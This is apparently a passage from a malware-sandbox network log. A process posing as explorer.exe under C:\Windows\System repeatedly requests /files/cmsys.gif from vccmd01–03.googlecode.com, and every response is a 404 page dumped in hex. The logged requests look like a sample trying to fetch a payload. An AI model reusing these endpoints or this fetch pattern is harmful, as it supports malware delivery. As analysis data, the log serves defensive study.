                                                                                  Aug 5, 2022 09:09:51.712469101 CEST1370INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  14192.168.2.449781142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:09:54.072979927 CEST1379OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd03.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:09:54.100311995 CEST1381INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:09:54 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:09:54.100342035 CEST1381INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  15192.168.2.449783142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:10:06.900579929 CEST1386OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:06.928702116 CEST1388INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:06 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:06.928729057 CEST1388INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  16192.168.2.449784142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:10:10.252279043 CEST1389OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd02.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:10.279514074 CEST1390INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:10 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:10.279551029 CEST1391INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  17192.168.2.449785142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:10:12.731399059 CEST1392OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd03.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:12.758972883 CEST1393INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:12 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 